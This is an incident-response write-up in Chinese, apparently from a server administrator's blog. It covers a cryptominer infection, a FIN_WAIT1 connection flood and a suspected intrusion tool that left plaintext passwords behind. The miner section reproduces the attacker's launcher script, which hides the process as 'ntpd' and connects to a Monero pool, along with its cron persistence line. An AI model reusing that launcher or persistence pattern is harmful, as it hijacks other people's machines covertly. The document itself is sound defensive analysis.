Alice服务器被挖矿程序入侵
第一个事件是服务器被挖矿程序入侵,导致CPU资源被大量占用
1. top发现有一个进程占用非常高
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
105990 root 20 0 2449864 74544 2132 S 3099 0.1 6772:46 md
2. ps aux | grep 105990 发现了
root 105990 3092 0.0 2449864 74544 ? SLl 13:22 6782:51 ntpd -a cryptonight -o stratum+tcp://pool.supportxmr.com:80 -u 495XypvWKBV2QbBpYJLbVi4xGrtnNYKiyFhTo5RNVLsJDTmqQyEwp4LbPLC2BxASqteYiK2aGYcif95kMCdmGZcRHRibnre -p re
(中间有很长一段空格)
根据「cryptonight」查阅信息,猜想是挖矿程序
3. 查找find / -name md 发现有
/dev/shm/.ntld-vslt/md
4. kill掉进程 发现过一会又自动启动,于是通过crontab -e查看是否有定时任务。果然有:
* * * * * /dev/shm/.ntld-vslt/upd >/dev/null 2>&1
用crontab -r删除
5. 查看/dev/shm/.ntld-vslt/ 目录
drwxr-xr-x 2 root root 240 Jan 11 20:53 .
drwxrwxrwt 3 root root 60 Jan 11 13:17 ..
-rw-r–r– 1 root root 7 Jan 11 13:22 ?
-rwxr-xr-x 1 root root 329 Oct 27 21:30 a
-rw-r–r– 1 root root 7 Jan 11 13:22 bash.pid
-rwxr-xr-x 1 root root 50 Jan 9 20:08 cron.d
-rw-r–r– 1 root root 20 Jan 9 20:08 dir.dir
-rwxr-xr-x 1 root root 14304 Nov 29 02:29 h64
-rwxr-xr-x 1 root root 2979640 Sep 10 11:39 md
-rwxr-xr-x 1 root root 797 Dec 16 01:41 run
-rwxr-xr-x 1 root root 206 Jan 9 20:08 upd
-rwxr-xr-x 1 root root 24 Oct 5 02:45 x
可以看到run中是这样的脚本:
#!/bin/bash
proc=`nproc`
ARCH=`uname -m`
HIDE=”ntpd”
if [ “$ARCH” == “i686” ]; then
./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://pool.supportxmr.com:80 -u 495XypvWKBV2QbBpYJLbVi4xGrtnNYKiyFhTo5RNVLsJDTmqQyEwp4LbPLC2BxASqteYiK2aGYcif95kMCdmGZcRHRibnre -p re >>/dev/null &
elif [ “$ARCH” == “x86_64” ]; then
./h64 -s $HIDE ./md -a cryptonight -o stratum+tcp://pool.supportxmr.com:80 -u 495XypvWKBV2QbBpYJLbVi4xGrtnNYKiyFhTo5RNVLsJDTmqQyEwp4LbPLC2BxASqteYiK2aGYcif95kMCdmGZcRHRibnre -p re >>/dev/null &
else
./h64 -s $HIDE ./mdx -a cryptonight -o stratum+tcp://pool.supportxmr.com:80 -u 495XypvWKBV2QbBpYJLbVi4xGrtnNYKiyFhTo5RNVLsJDTmqQyEwp4LbPLC2BxASqteYiK2aGYcif95kMCdmGZcRHRibnre -p re >>/dev/null &
fi
echo $! > bash.pid
6. 修改权限,删除目录并备份存档
7. 开启ufw防火墙
Alice服务器遭到大量fin_wait1攻击
第二个事件是服务器遭到fin_wait1攻击,导致响应缓慢
1. 通过命令 netstat -n | awk ‘/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}’ 查看各种类型数据包的数量:
LAST_ACK 1
CLOSE_WAIT 10
ESTABLISHED 5
FIN_WAIT1 1869
FIN_WAIT2 4
TIME_WAIT 5
2.编辑文件 vim /etc/sysctl.conf文件,增加:
net.ipv4.tcp_fin_timeout = 10
net.ipv4.tcp_keepalive_time = 30
net.ipv4.tcp_window_scaling = 0
net.ipv4.tcp_sack = 0
再执行以下命令,让修改结果立即生效:
/sbin/sysctl -p
参考博客:http://blog.csdn.net/talent210/article/details/65441819
服务器疑似被vlun渗透
1. 在检测服务器性能时,发现top有如下未知程序:
2.kill之后还会重现,查看其父进程:
3. 通过搜索class文件,找到如下目录。猜想是vlun渗透程序。参考资料:http://www.91ri.org/11497.html
在此目录中发现了明文存放的此服务器各用户名密码,以及我组数台服务器的root密码。
4. 将此文件夹备份,删除解决。提醒各服务器维护人员,定期检查系统,检查远程登录记录,定期修改root密码。
建议在防火墙里关闭ssh校外远程登入。